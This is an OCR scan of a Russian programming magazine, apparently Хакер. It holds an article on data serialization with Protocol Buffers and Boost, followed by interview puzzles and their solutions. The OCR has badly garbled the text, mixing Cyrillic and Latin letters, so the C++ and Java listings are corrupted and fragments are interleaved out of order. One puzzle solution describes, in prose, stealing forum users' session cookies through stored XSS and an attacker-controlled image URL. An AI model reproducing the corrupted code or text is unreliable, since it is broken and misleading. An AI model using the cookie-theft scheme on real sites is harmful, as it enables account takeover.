приходится писать много кода, 
чтобы засейвить состояние 
объектов в ПО. Сегодня мы 
узнаем, как избежать написания 
килобайтов вспомогательного 
кода сериализации. 








сіееопіз 

с1ееопі5@атаіІ.сот 



Д ля начала небольшой ликбез. Сериализация — 
это процесс перевода какой-либо структуры 
данных в последовательность байт. Эта по- 
следовательность может быть как бинарным 
представлением этих данных, так и текстовым. 
В большинстве случаев сериализация нужна для сохранения 
состояния программы на жесткий диск или пересылки каких- 
либо сообщений по сети. Распаковка сериализованных дан- 
ных называется десериализацией. 

СЕРИАЛИЗАЦИЯ СВОИМИ РУКАМИ 

Когда перед программистом встает задача упаковки струк- 
тур данных, например для их последующей передачи по сети, 
у него есть несколько путей, по которым он может пойти. Один 
из них — написать все самому, с нуля. Но и тут перед ним от- 
крывается развилка из трех дорог. 

Самый простой и довольно популярный способ — это пред- 
ставить все данные в виде строк. В этом случае на выходе мы 
получим поток АЗСІІ-символов (а может быть, и не А5СІІ), ко- 
торый затем будет передан по сети или записан в файл. Если 
попробовать набросать схематичный код, то он будет выглядеть 
примерно так: 



Сериализация в строки 
с1а55 МуСІазБ 

{ 

ІПІ; х; 

І.ПІ:. у; 

5І:сІ: : бігіп^ бііг; 
риЬИс; 

ѵоісі МуС1а55() 

{ 

X = 120І 
У = 23; 

5І:г = "5оте 5І:гіп§" 

} 

5І:сІ: :5І:гіп§ 5аѵе() 

{ 

5'ЬсІ : : 5'Ьгіп§5І:геат оиі:; 

ой! << X << ’\п' << у << '\п Ѵ << 5І:г; 

геііигп ои1:.5І:г(); 

} 
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На выходе функции заѵе мы получим примерно такую стро- 
ку: «120\п23\пзоте зігіпд». Плюсы этого подхода в том, что дан- 
ные остаются сравнительно читаемыми для человека, а сама 
реализация проста и не требует специальных знаний. А основ- 
ным минусом тут будет то, что представление структур в виде 
строки подойдет только для очень простых наборов данных. 

К тому же придется писать довольно много кода для кодирова- 
ния и декодирования, а скорость его выполнения будет остав- 
лять желать лучшего. 

Другой популярный метод — это запись данных в ХМІ. 
Разнообразных библиотек, занимающихся парсингом ХМІ- 
файлов, можно насчитать великое множество, что упрощает 
процесс написания механизмов сериализации. Данные в этом 
случае представлены еще нагляднее, да и гибкость тут на высо- 
те. Многие популярные протоколы используют этот язык раз- 
метки в качестве своей основы, так как он расширяемый и по- 
зволяет не сильно задумываться об обратной совместимости 
при обновлении структуры данных. К таким протоколам можно 
отнести 50АР или ЗаЬЬег. 

Но, как и в случае с предыдущим способом, чтение и запись данных в ХМЬ 
формат накладывает большие ограничения на производительность. Навига- 
ция по дереву неслабо нагрузит процессор, да и код все-таки тоже придется 
немного дописать, чтобы все работало так, как задумано. Еще один минус, 
о котором многие забывают в эпоху высокоскоростного интернета, — это раз- 
мер получаемых данных. При достаточно больших объемах информации или 
плохих сетевых соединениях использовать ХМЕ не очень целесообразно. 

Ну и наконец, последний метод, который получил широкое распростра- 
нение, — это упаковка в бинарный вид. В этом случае мы практически полно- 
стью теряем читабельность сериализованных данных, но зато значительно 
выигрываем в скорости их парсинга и выходном объеме. Все бы хорошо, 
но в случае байтового представления информации мы получаем кучу про- 
блем с совместимостью при изменении структур данных в программе, а так- 
же тратим много усилий на поддержку кода упаковки и распаковки в актуаль- 
ном состоянии. 

РНОТОСОІ ВиРРЕНЗ рвом соосіе 

Все недостатки перечисленных методов призван устранить ргоіоЬиТ от Гуг- 
ла. Ргоіосоі Ви^егз — это специальный метод кодирования структур данных, 
который позволяет быстро и без проблем сериализовать все что угодно. 
РВ имеет официальную поддержку от Гугла для таких языков, как С+-*-, иаѵа 
и РуІЬоп. Эта подд.ержка выражается в наличии компилятора для специаль- 
ного языка, описывающего структуры данных. 

Начать работу с сериализацией от поискового гиганта очень просто. Спер- 
ва следует описать данные в рго!о-файле. Представим, что мы делаем тулзу, 
которая работает со списком людей и номерами их кредитных карт. На языке 
ргоІоЬи^ требуемые структуры данных будут выглядеть примерно так: 

Описание данных в ргоѣо-файле 

раскате СагсІзАрр; 



тезза^е СагсІНоІсІег { 

периігесі зіігіп^ Ягз1:Nате = 1^. 
гедиігесі з-Ьгіп§ 1аз1:Nате = 2 ; 
гедиігесі іп1:32 І 6 = 3; 



_епит..СагсІТуре { 

ѴІ5А = 0; 

МА5ТЕКСАК0 = 

АМЕКІСАМЕХРКЕ55 = 2 ; 

} 



тезза^е СгесііІіСагсІ { 

гедиігесі з1:гіп§ сагсINитЬег = 1 ; 

орііопаі СагсІТуре 1:уре = 2 [сІе-РаиИ = ѴІ5А]; 

} 



гереаііесі СгесІі1:СагсІ сагсі = 4; 

} 

тезза^е СагсІНоІсІегзІізІ: { 

гереаііесі СагсІНоІсІег регзоп = 1; 

} - - 

Беглый взгляд на содержимое вызовет легкое чувство дежавю у С++- 
и ^аѵа-кодеров. И действительно, синтаксис очень похож. В начале файла на- 
ходится строка с именем пакета. Она определяет область видимости данных 



и служит для предотвращения конфликта имен. Далее следует 
блок с сообщениями, которые начинаются с ключевого слова 
теззаде. Эти конструкции являются аналогами структур в С++. 
Поля сообщения поддерживают такие типы данных, как ЬооІ, 
зігіпд, ІПІ32 и так далее. Например, поле ІігзШате является 
строковой переменной. В начале объявления этой переменной 
находится ключевое слово гедиігесі. Из названия нетрудно до- 
гадаться, что это поле должно быть всегда инициализировано. 
Всего таких спецификаторов может быть три: гедиігесі, орііопаі 
и гереаіесі. Орііопаі говорит протобаф-компилятору, что поле 
может быть не инициализировано, а гереаіесі сообщает о воз- 
можности неоднократного повторения переменной, описанной 
с помощью этого спецификатора в структуре данных. Кроме 
того, каждый элемент имеет так называемые таги (десятичная 
цифра после знака равно в конце объявления). 

В примере видно, что, помимо сообщений, мы можем опре- 
делять перечисления, а сами теззадез могут быть вложены 
одно в другое и использоваться как пользовательские типы 
при объявлении элементов других сообщений. Все это обе- 
щает нам, простым программистам, высокую гибкость и кучу удовольствия 
от работы с кодом. 

После правильного описания используемых нами данных скормим 
наш протофайл специальному компилятору. Скачать его можно по ссылке 
на врезке. Поскольку Ооодіе официально поддерживает целых три языка 
программирования, то компилеру надо знать, под какой язык мы генерируем 
код. Если наш файл называется сагсіііоісіегз.ргоіо, то для успешного заверше- 
ния операции командная строка будет выглядеть примерно так: 

ргоііос -І=$5КС_0ІК --срр_ои1:=$05Т_0ІК $5КС_0ІК/^ 
сагсІЬо1сІег5.рго1:о_ 

Тут стоит обратить внимание на параметр --срр_ои1, именно он опреде- 
ляет, что мы генерируем код для С++. Заглянув в получившийся на выходе 
сгасІзарр.рЬ.Іі, можно найти много всего интересного. Заголовочный файл 
получился достаточно объемный, и полный его листинг тут показать сложно, 
но зато без проблем можно разобраться с некоторыми его кусками. 

С++-КОД для сообщения СагсІНоІсІег 

//. .бгзТНате 

іпііпе Ьроі Ііа5_бг5І:Мате() .^:оп5Т^._ 

іпііпе ѵоісі с1еаг_бг5І:Нате() ; 

ІпІіпе.хопзТ. зТЦ бгзТМатеС ) сопзі: ; 

іпііпе. ѵр_ісІ 5еТ_б^^ :з1:сІ: :5Іігіпё& ѵаіие); 

іпііпе ..ѴОІСІ 5еТ_Яг5ТNате(со.п.5.Т„.сЬ.а^ ѵаіие),; 

іп.І.іп.е : : зТсі : : зТ гіп^* ти1іаЫе_б г 51:Nате ( ) ; 



//. ІазТМате 

.іП.1.і.пе..Ьоо1 Ііа5_.1а5І:Нате() сопз.і:; 

іпііпе ѵоісі сІеаг^ІазТМатеХ); 

.іп.Ше.,.соя5.1..: ; 5ІІСІ : :з1:гіпё& 1аз1:Мате() сопзі:; 
іп.1іпе....ѵ.0,і.сІ зе1:_1а5-І:Нате(соп5..Т., : :з1:сІ: :з1:гіпб& ѵаіие); 
іпііпе ѵоісі 5еТ_1аз1:Нате(со.п5.Т._.сМг.* ѵаІие); 
іпііпе : ізіісі: ізТгіпё* ти1іаЫе_1а5ТНате(); 



/У ІСІ 

І.П.1 і п е _.Ь.оо.1 Іі а 5_і сЦ }. .с о п.з Т; 

іп.ііпе .ѴОІСІ с Іеа г_ісІ ( ) ; .... 

і п 1.іп.е і пТ 32_1і ІСІ ( ) ..с.о.п.зТ.;^ 

.і п 1.і.п.е...у.оі.сІ.. зеТ^ісІ ( і пТ 3 2_1і ѵаіие); 

//..сагсі. 

.ідііп.е ТпТ. сагсІ_5І2е() сопзі:; 
.іп.1.іпе..ѵоісІ с1еаг_сагсІ( ) ; 



і.пИпе .со.п.зТ : : ^оо^іе : : ргоІіоЬи-Р : : КереаТеОРТгРіе1с1< е. 
: іСагсІзАрр: :Сагс1Но1сІег_СгесШ:СагсІ >& сагсі ( ) сопзі:,; . 



і.пИпе : :ёооб1е: :рго1:оЬи-Р: :Кереа1іесІР1:гРіе1сІ< — 

: гСагсІзАрр: :Сагс1Но1сІег_СгесІіТСагсІ >* ш1;аЬіе_сагсІ(); 

іп1іп.е...с.0П5І:. : :СагсІзАрр: :СагсІНо1сІег_Сгес1іССагсІ& е. 
сагсІ(іпТ іпсіех) сопзТі 

іпііпе : іСагсІзАрр: :СагсІНо1сІег_Сгес1і1:СагсІ* 

ти1іаЫе_сагсІ(іп1:. іпсіех); 

іпііпе...;.; СагсІзАрр::СагсІНо1с1ег_СгесІі1:СагсІ*.^ 

асІсІ_сагсІ(); 




ѵѵѵѵѵѵ 
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Мы видим, что для каждого поля сообщения СагбНоІбег сгенерился 
метод с1еаг_ххх(), где вместо ххх имя поля. По названию не трудно дога- 
даться, что он делает. Также присутствуют методы Иа5_ и зеІ_. Значение 
элемента получается через функцию с именем, аналогичным имени этого 
элемента. Особое внимание следует уделить полю сагб. Из-за того что мы 
его пометили как гереаіеб, код для него получился немного другой. В част- 
ности, у нас есть метод _5і2е(), который возвращает количество банков- 
ских карт, закрепленных за человеком, а также метод абб_, служащий 
для добавления элемента к уже существующим. Поля с пометкой орііопаі 
или гереаіеб могут предоставить доступ к сырому указателю с помощью 
тЩаЫе_ "деМег". Для более детального изучения того, что нагенерил 
ргоіос от «корпорации добра», крайне рекомендуется заглянуть внутрь по- 
лучившегося И-файла. 

Помимо перечисленных методов, каждый класс Ргоіосоі ВиТІег имеет 
функции сериализации в бинарное представление и парсинга этого пред- 
ставления. 

Методы для парсинга и сериализации 

Ьооі 5егіа1І2еТо51:гіп§(5'1:гіп8* ои1:ри'1;) соп5І^; 

Ьооі РагБеРготБ-ЬгіпбСсопБ-і; 5І:гіпё& сІа-Ьа); 

Ьроі 5егіа1І2еТо05^ЬгеапіСо5'Ьгеат* оиііри'і:) соп5:Ь; 

Ьооі Раг5еРготІ5І:геат(І5І:геат* іприі;); 

Тут следует заметить, что 8 егіаІі 2 е-методы используют ЗТІ-строку лишь 
в качестве контейнера для бинарных данных. Не стоит надеяться, что, загля- 
нув внутрь зігіпд-переменной, можно будет обнаружить хоть сколько-нибудь 
читаемый текст. 

Теперь мы наконец добрались до самого интересного — использования 
полученных классов на практике. Это очень просто. Чтобы убедиться в этом, 
достаточно взглянуть на код ниже. 

Сериализация и десериализация ргоІіоЬи'Р 
іпТ таіп(іп1; аг^Сд сЬаг* аг§ѵ{]) 

{ 

С00СІЕ_РР0Т0ВиР_ѴЕКІРѴ_ѴЕР5І0Мі 

СагсІзАрр: :СагсІНо1сІег5ІІ5Т сагсІ_Ьо1сІег5; 

// Добавляем кардхолдера .... 

АсІсІТоСагсІНо1сІег5(сагсІ_Ьо1сІег5 .абб_рег50п()); 



У/...З.а,пи,сыв,а.ем^^ в 

■РзТгеат оиТри1:(аг§ѵ[1] ^ іо5::оиТ | іоБііТгипс .-і 
I іоз: :Ьіпагу); 

і-р ( ! абсІге55_Ьоок.5егіа1і2еТо05І:геат(&ои1:ри‘1:) ) 

{ 

сегг << "Раііесі То \л/гіТе біе." << епсіі; 
геТигп -1; 

} 

// Считываем из файла 

■РзТгеат іприТ(аг§ѵ[1] л іоб::іп 1 І05::Ьіпапу); 
і-Р (ІіприТ) 

{ 

соиТ << аг§ѵ[1] << "; Рііе поТ -РоипсІ. 

СгеаТіп§ а пеіл/ Рііе." << епсіі; 

} 

еІ5е І-Р ( !сагсІ_Ііо1с1ег5.Раг5еРготІ5Р:геат(&іприТ)) 

{ 

сегг << "Раііесі То рагзе Рііе." << епЫ; 
геТигп -1; 

}. 

// Выводим на. .экран. 

ІІ5ТСагсІНо1сІег5(сагсІ_Ьо1сІег5) ; 

//. ,0ч и с.тка. ..памяти 

боо^іе: :ргоТоЬи-Р: :5ЬиТсІо\А»пРгоТоЬи-РІіЬгагу(); 
геТигп 0; 

} 

Первое, что мы видим в таіп-функции, — это макрос проверки версии 
протобафа — СООСІЕ_РРОТОВиР_ѴЕРІРУ_ѴЕР8ЮМ. Если мы прилинко- 
вали библиотеку, которая не поддерживает сгенерированный нами заго- 
ловочный файл, то нам об этом сообщат. Далее мы объявляем перемен- 



ную сагб_Ьо1бег5, которая будет содержать все записи о владельцах карт. 
На текущий момент там пусто, и мы добавляем туда одну запись вызовом 
функции АббТоСагбНоІбегз, код которой рассмотрим чуть ниже. Для со- 
хранения всего этого в файле мы открываем файловый поток и вызываем 
5егіаІі2еТоОзРгеат. 

Чтобы убедиться в том, что все прошло нормально, прочитаем сериа- 
лизированные сообщения из только что созданного протобафом файла. 
Для этого создадим еще один поток с атрибутами чтения и вызовем метод 
РагзеРготІзІгеат. После этого выведем на экран прочитанное с помощью 
написанной нами функции ЫзЮагсІНоІсІегз. Ну а в конце не забываем вызвать 
доодІе::ргоІоЬиІ::8ЬиІс1оѵѵпРго1оЬиТиЬгагу() для предотвращения утечек па- 
мяти. 

Ну и напоследок взглянем на код функций ЫзІСагсІНоІсІегз 
и АсІсІТоСагсІНоІсІегз. Тут все настолько просто, что достаточно будет лишь не- 
скольких строк из них. Доступ к элементам сообщения осуществляется с по- 
мощью ОЕТ -методов, имена которых совпадают с именами самих элементов. 
Запись значений производится при помощи зе1_ методов. 

Добавление и вывод сериализованных данных 

у.оісі. ІІ5ТСагс1Но1(іег5(соп5^^ СагсІзАрр: :Сагс1Но1с1ег5Іі5І;& 

сагсІ_Ііо1сІег5) 

{ 

■Рог (іп-1; і = 0; і < сагсІ_Ио1сіег5 . регзоп_5І2е( ) ; і++) { 

.СОП5.Т СагсІзАрр: :СагсІНо1сІег& регзоп = 

сагсІ_Ііо1сІег5 . регзоп ( і ) ; 

соиТ << "Регзоп 10: " << регзоп. ісІ() << 

епсіі; 

соиТ << "РігзТ Мате: " << регзоп. бгз1:Мате( ) .^ 

<< епсІІ; 

соиТ << "РігзТ Мате: " << регзоп. 1азТМате() 

<< епсІІ; 

// Далее код вывода кредитных карт 

} 

} 

ѵрігі АсІсІТоСагсІНоІсІегз (сопз-І: СагсІзАрр: :СагсІНо1с1ег-1:& 
сагсІ_Ііо1сІег) { 

соиТ << "ЕпТег регзоп 10 питЬег: "; 
іп-І: ісі; 
сіп >> ісі; 

сагсІ_Ьо1сІег- >зе-1_ісІ ( ІСІ ) ; 
сіп.іепоге(256^ ’\п'); 

соиТ << "ЕпТег Ягзі пате: "; 

§е■^;1іпе(сіп^ *сагсІ_Ііо1сІег->ти1;аЫе_РігзТМате()); 

соиТ << "ЕпТег ІазТ пате: "; 

§е1:1іпе(сіп^ *сагс1_Ііо1сІег->ти-1;аЫе_1аз1;Мате() ); 

// Далее код ввода кредитных карт 

} 

В 008 Т:: 8 ЕтАи 2 АТІ 0 Ы 

Сериализация от Гугла не единственная в своем роде. Есть еще всемогу- 
щий ЬоозТ Принципы его работы немного отличаются от Рго^осоІ ВиР^егз. 
В частности, бустовая сериализация не требует описания структур данных, 
что представляется, с одной стороны, плюсом, поскольку не надо разби- 
раться в генерируемом коде, а с другой — минусом, так как тебе придется 
ручками добавлять в каждый класс поддержку сериализации. Хотя послед- 
нее довольно спорно. Гугловая библиотека генерирует простейшие классы, 
и, скорее всего, их будет недостаточно для реализации задуманного набора 
функций над данными, и тебе придется писать классы обертки. В Ьоозі же 
ты пишешь классы с той функциональностью, которую захочешь, и потом до- 
бавляешь к ним сериализацию. К сожалению, формат статьи не позволяет 
рассмотреть ЬоозІ::зегіаІі 2 аІіоп, но для особо любознательных соответству- 
ющие ссылки во врезку уже добавлены. 

ЗАКЛЮЧЕНИЕ 

Рго!осо1 Ви^егз, Ьоозііізегіаіігаііоп — все это довольно мощные инструменты, 
которые позволят перевести данные и объекты в твоей программе в бинар- 
ный вид и безопасно переслать их по сети или сохранить в файл до лучших 
времен. В большинстве случаев эти библиотеки полностью оправдывают 
возлагаемые на них надежды, но в особо больших и сложных проектах писать 
собственные велосипеды не так уж и плохо — разумеется, в том случае, если 
тебе не хватает гибкости уже существующих. Но прежде чем отбрасывать го- 
товые решения, следует хорошо их изучить. 31 
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ЗАДАЧИ НА 
СОБЕСЕДОВАНИЯХ 



РЕШЕНИЯ 
ЗАДАЧ ИЗ 
ПРЕДЫДУЩЕГО 
НОМЕРА 



ЗАДАЧА ОТ « Л АБОРАТОРИ И 
КАСПЕРСКОГО» 

У нас есть довольно посещаемый блог, где к каж- 
дой записи любой зарегистрированный пользова- 
тель может оставлять комментарии. Блок коммен- 
тария имеет формат, приведенный на рисунке 1 . 

Нам достоверно известно, что поле <имя 
пользователя> не проходит никакой обработки 
перед отображением на странице, то есть мы 
имеем типичную Х88-уязвимость. 

Опишите схему атаки, чтобы завладеть учет- 
ными записями завсегдатаев форума. При каких 
предположениях нам удастся завладеть учет- 
ными записями? Что можно предпринять, что- 
бы предотвратить кражу учетных записей даже 
при наличии подобной уязвимости? 

РЕШЕНИЕ 

Предполагается, что авторизованный на сайте 
пользователь получает специального вида соокіе, 
которую нам и нужно украсть. 

Чтобы украсть соокіе, нам нужен сниффер. 
Для этого нам потребуется сторонний домен, 
на котором у нас есть доступ к логам доступа. 
Мы регистрируемся на форуме с именем, содер- 
жащим НТМІ-тег, например <ітд> с размером 
0x0 рх. В качестве исходника картинки ставим УРЬ 
на нашем домене с параметром, содержащим 
с1оситеп1.соокіе(). После регистрации оставля- 
ем несколько комментариев в наиболее активных 
ветках форума и принимаем соокіе с авторизаци- 
онными данными посетителей, просмотревших 
страницу с нашим комментарием. Далее методом 
подмены соокіе в браузере мы заходим на фо- 
рум и можем выполнять действия от имени чужой 
учетной записи. 

Кстати, если привязывать сессию к ІР-адресу, 
то это серьезно усложнит возможность использо- 
вать украденную соокіе для авторизации. 

ЗАДАЧА ОТ ИТ- КОМ ПАН И И 

сизтіз 

Следующий серверный код на ^аѵа осуществляет 
обработку документа, полученного из входящего 



Специальный подгон ^ 

ТЕСТЫ ОТ КОМПАНИИ Т-$У$ТЕМ$ 

(СТРАТЕГИЧЕСКОЕ ПОДРАЗДЕЛЕНИЕ ГРУППЫ КОМПАНИЙ 0Е0Т8СНЕ ТЕІЕКОМ) 



1 . В какой из перечисленных ниже 
моделей разработки программного 
обеспечения (ПО) тестирование пред- 
усмотрено в минимальном 
объеме? 

а) РУР (Раііопаі УпіЛесІ Ргосезз); 

б) ХР (ЕхІгетеРгодгаттіпд); 

в) Ѵ-модель. 

2. В чем заключается основное отли- 
чие моделей НАО (Рарісі Арріісабоп 
Оеѵеіортепі) и 080М (Оупатіс 
Зузіетв Оеѵеіортепі МеІИосІ)? 

а) В модели 080М более конкретно опреде- 
лены шаги и роли; 

б) По модели РАО, тестированием занимает- 
ся отдельная команда специалистов: 

в) 080М является эволюционной, а РАО — 
инкрементальной моделью. 

3. Какой вид тестирования чаще всего 
применяется в модели ХР? 

а) Компонентное тестирование; 

б) Нагрузочное тестирование; 

в) Системное тестирование. 

4. Основная цель модели РАО: 

а) Максимально вовлечь конечного пользо- 
вателя в процесс разработки и тестирова- 
ния: 

б) Применить тестирование на ранних 
этапах процесса разработки: 

в) Максимально уменьшить время 
на разработку и поднять 

при этом качество ПО. 

5. Какая модель является расширением 
и улучшением общей Ѵ-модели? 

а) Модель водопада; 

б) ѴѴ-модель; 

в) Ѵ-модель ХТ. 

6. Что из перечисленного ниже 

не является фазой в соответствии 
с моделью РУР? 



а) Разработка: 

б) Тестирование; 

в) Разработка концепции. 

7. Какая из моделей разработки 

ПО не относится к итерационным? 

а) Инкрементальная; 

б) Эволюционная; 

в) Последовательная. 

8. Как в общей Ѵ-модели называется 
процесс проверки качества результа- 
тов предыдущего шага? 

а) Верификация: 

б) Валидация; 

в) Дебаггинг. 

9. Выберите верные высказывания 
о ѴѴ-модели: 

I Тестовые сценарии должны разраба- 
тываться сразу после готовности за- 
даний и спецификаций, не дожидаясь 
какой-либо версии ПО; 

II Тестирование и дебаггинг проводятся 
тестировщиком ; 

III Найденные ошибки, повлекшие за со- 
бой необходимость изменения ПО, 
возвращают весь процесс в верхнюю 
точку левой ветки ѴѴ; 

IV Тестирование проводится циклически; 

V Тестировщик принимает участие 

в процессе разработки ПО с самых 
ранних этапов. 

а) II, III, IV; 

б) І,ІѴ,Ѵ; 

в) II, ІѴ,Ѵ. 

10. Что такое принцип «М08СОѴѴ»? 

а) Принципиальное различие процесса 
тестирования в России и Европе; 

б) Принцип распределения обязанностей 
по ролям в соответствии 

с ‘V’- моделью ХТ; 

в) Принцип классификации требований 

к ПО в соответствии с моделью 080М. 



Бонус читателю-решателю: если ты успешно справился с заданием, Т-Бузіетз приглашает 
тебя на обучение в Тезі 8с1юо1 в Санкт-Петербурге. Во время обучения выплачивается стипен- 
дия, лучших возьмут на работу. Ответы присылай на адрес 1езізс^іооІ@1-зѵз^етз.ги . указав 
ФИО и контактные данные. Учебные группы набираются регулярно в течение года 
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сообщения ЛѴ15, в процессе которой выполняет 
операции с базой данных и отправляет в ответ 
подтверждение. От заказчика появилось тре- 
бование вести в базе данных журнал обработки 
сообщений, в который необходимо записывать 
информацию о результатах обработки. Для это- 
го был реализован сервис ІодЗегѵісе с методом 
Іод(8ігіпд гпевзаде, ТИгоѵѵаЫе саизе). 

Измените приведенный код, добавив запись 
в журнал любых результатов обработки и обеспе- 
чив корректную обработку ошибок: 

@Тгапзас1:іопа1 

риЬИс уоісі ргосе550оситеп1;(0оситеп-1: 
сіоситепі:) ЛПгрмз 5егѵісеЕxсер1;іоп^ 
Мез5а§іп§Ехсер1:іоп { 

іі. (І5Ѵа1ісІ(сіоситеп'Ь)) { 

сІоситепІБегѵісе.з-ЬогеС сіоситепі;); 
теззабіпбЗегѵісе . зепсІ«-^ 
(Аскпоіл/ІесІбетепІіБ . сІоситепІіРесеіѵесІ— 
(сіоситепі;!:)); 

} еізе { 

те55а§іпе5егѵісе . зепсІ«-^ 

(Аскпом1есІ2етеп1:5.сІоситеп1:Іпѵа1ісІ«-‘ 

(сіоситепі;)); 

} 

} 



Расскажите, как можно протестировать полу- 
ченный код. Расскажите, как должен быть реали- 
зован метод аисііі, чтобы гарантировать запись 
в журнал любых результатов. 

РЕШЕНИЕ 

Для начала необходимо разобраться, что дела- 
ет приведенный код: мы видим здесь распре- 
деленную транзакцию, в которой проверяется 
корректность входящего документа, его сохра- 
нение в базу данных и отправка подтвержде- 
ния. Судя по сигнатуре метода, какие-то из этих 
операций могут сгенерировать исключение 
ЗегѵісеЕхсерІіоп, а отправка подтверждения, ско- 
рее всего, генерирует еще и МеззадіпдЕхсерІіоп. 
Нельзя исключать, что в процессе обработки 
может также возникнуть РипІітеЕхсерІіоп. Мы 
не знаем, с какой версией иаѵа работает этот код, 



АЙТИШНАЯ 
КОМПАНИЯ! ШЛИ 
НАМ КАЧЕСТВЕННЫЕ 
ЗАДАЧКИ, И МЫ 
ИХ ОПУБЛИКУЕМ! 
БЕСПЛАТНО, БЕЗ 
РЕГИСТРАЦИИ, 
БЕЗЗМЗ, НА 
МАКСИМАЛЬНОЙ 
СКОРОСТИ. И ПРО 
БЕСПЛАТНЫЕ 
АЙФОНЫ САМЫМ 
ГРАМОТНЫМ 
ЧИТАТЕЛЯМ ПРОСЬБА 
НЕ ЗАБЫВАТЬ, 



АВВѴѴ 

ЗАДАЧИ 
ОТ КОМПАНИИ 
АВВѴѴ 

Рещение этих задач 
ждет тебя на нашем 
диске. Должно же 
быть что-то, что мог- 
ло бы подвигнуть 
тебя вставить его 
в дисковод! 



Предполагается, что авторизован- 
ный на сайте пользователь получает 
специального вида соокіе, которую 
нам и нужно украсть 





<имя пользователя> 


<аватар> 


<Текст комментария> 


Ответить 




Редактировать 




Удалить 



Рис. 1 



поэтому для краткости изложения будем считать, что это ^аѵа 7. Попробуем 
его модифицировать: 

риЬИс Іпіег-Еасе Ооситеп1:Ргосе550г { 

Резиіі: ргосе550оситеп1:(0оситеп1; сіоситепі:) 1;|іго\а; 5 е 

Ргосез5ІпбЕхсер1;іоп; 

} 

Р.иМіс,.с1а55_0е-Раи11:0оситеп1:Ргосе55ог ітр1етеп1:5 ^ 

ОоситепІРгосеззог { 

@Тгап5ас1:іопа1 

риЬІіс Кезиіі; ргосе 550 оситеп 1 ;( 0 оситеп 1 ; сіоситепі:) 1:11гоы5 4-* 

Ргосе55Іп§Ехсер1:іоп { 

-Хгу { 

іі ,(І5Ѵа1ісІ (сіоситепі;)) { 

сІоситепІіБегѵісе . 5І:оге(сІоситеп1:) ; 

теззабіпбБегѵісе. 5епсІ(Аскпоѵу;1есІ§етеп1;5.4-' 

сІоситеп1;КесеіѵесІ(сІоситеп1;)); 

геііигп 00СиМЕМТ_РК0СЕ55Е0; 

} еізе ...{ 

те55а§іпб5егѵісе.5епсІ(Аскпоѵ\і1есІ§етеп1:5.4-» 

сІоситеп1:Іпѵа1ісІ(сІоситеп1:)); 

ге1:игп ^ОС^МЕNТ_INVА^I^; 

} 

} саіісіі (5егѵісеЕхсер1;іоп | Мез5а§іп§Ехсер1;іоп е) { _ 

ІІІ 1 Г 0 Ы пем Ргосе55Іп§Ехсер1;іоп(е); 

} 

ь 

> - - 

риЬІіс сіазз Іо§§іп§0оситеп1:Ргосе55ог Ітр1етеп1:5 

0оситеп1:Ргосе55ог { 

@Іпзес1; 

0е-Раи11:0оситеп1:Ргосе55ог сіеіе^аіе; 

@Іпзес1; 

АисІі1;5егѵісе аисІі1;5егѵісе; 

---Р.иЬИс Кезиіі: ргосеззОоситеп-ЬСОоситепф роситепі:) 1:Іігоѵ\;5 4-- 

Ргосе55Іп&Ехсер1:іоп { 

{ 

Кезиіі: гезиіі: = сІе1е§а1;е.ргосе550оситеп1; (сіоситепі:); 
аисІі1:5егѵісе.аисІі1;("сІоситеп1:Ргосе55есІ"^ гезиіі;); 
геііигп гезиІ'Ь; 



РЕШЕНИЕ СТАРОЙ ЗАДАЧИ ОТ ЧИТАТЕЛЯ: 

Владимир Гапоненко из Санкт-Петербурга ( дѵЬ81@Іі$1.ги) 



В декабрьском журнале «Хакер» за 2012 год на странице 101 была опубли- 
кована задача № 3 про лягушат. Решать ее предложили с помощью кругов 
Эйлера — не знаю, как другие читатели журнала, но я в такой способ реше- 
ния так и не въехал. Поэтому решил все-таки поломать себе мозг долгими 
логическими выкладками, и у меня, как ни странно, получилось более 
быстрое и простое решение. 

Исходя из условий задачи, лягушата могут быть: зеленые (3) или 
пестренькие (П), грустные (Г) или веселые (В), сидящие на берегу (Б) или 
плавающие в воде (ѴѴ). Получается не так уж и много возможных комбина- 
ций: 3ГБ, ЗИЛ/, ЗВБ, ЗВЩ ПГБ, ППЛ/, ПВБ, ПВѴѴ. Уточняем: если лягушонок 
зеленый, то он веселый — значит, вычеркиваем комбинации 3ГБ и ЗГЛЛ/. 
Если лягушонок грустный, то он сидит на берегу — вычеркиваем ППЛ/. Если 
лягушонок пестренький, то он плавает в воде — вычеркиваем ПГБ и ПВБ. 



В итоге остается только три возможных комбинации: ЗВБ, ЗВѴѴ и ПВѴѴ. 
Теперь сверяем их с утверждениями. Первое утверждение неверно, по- 
скольку возможна комбинация ЗБВ. Второе утверждение неверно, потому 
что возможна та же комбинация ЗБВ. Третье утверждение верно, посколь- 
ку подтверждается всеми тремя возможными комбинациями. Четвертое 
утверждение неверно, поскольку возможна комбинация ПВ\Л/. Пятое 
утверждение неверно, поскольку опровергается всеми тремя возможными 
комбинациями. И наконец, шестое утверждение неверно, потому что воз- 
можна та же комбинация ЗВБ. 

Думаю, что мой логический способ решения задачи будет более понятен 
людям с математическим складом ума, чем круги Эйлера, и особенно подой- 
дет в тех случаях, когда не нужно разбираться с десятком и более возможных 
комбинаций. 
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Задачи на собеседованиях 



т 



1 са1:сЬ (ргос | Рип1:ітеЕхсер1:іоп е) .{. 

аисІі'^Зегѵісе . аис1і1:( "с1оситеп1:Ргрсе55іп§Раі1есІ" , е) ; 
1:Ьгоц.. е; 



} 

} 

} 



Обращаем внимание, что аргумент функции 
принимается по ссылке (&$ѵаг), соответственно, 
корректно в нее можно передать только пере- 
менную. В нашем же случае в функцию переда- 
ется константа, поэтому ожидаемый результат 
работы скрипта — сообщение об ошибке: 



Как можно увидеть в получившемся фрагменте кода, мы выделили интер- 
фейс обработки документов и добавили еще одну его реализацию, осущест- 
вляющую запись в журнал. 

Это было необходимо, поскольку у нас используется декларатив- 
ная разметка транзакций (причем, скорее всего, на стеке технологий 
Зргіпд, а не ^ЕЕ, иначе была бы использована аннотация ТгапзасІіопАиг 
іЬиІе), соответственно, вероятны ошибки, возникающие за пределами 
метода ргосеззОоситепІ, например в фазе соттіі. В новой реализа- 
ции мы корректно обработаем такие ошибки и сделаем запись в журнал 
«сІоситепІРгосеззіпдРаіІесІ». 

Этот код будет работать исходя из предположения, что ошибки записи 
в журнал аудита являются фатальными для системы, — именно поэтому ис- 
ключения, возникающие в методе аисііі, не обрабатываются. 

Кроме того, новый код использует перегруженную версию метода аибі^ 
со следующей сигнатурой: 

риЫіс ѵоісі аисіі:^(51:гіпё теззаееКеу^ ОЬдесІ:... рагатз); 

Такой интерфейс позволяет делегировать формирование сообще- 
ния из прикладного кода метода ргосеззОоситепІ в сервис аудита, в ко- 
тором сообщение может быть построено, например, с помощью класса 
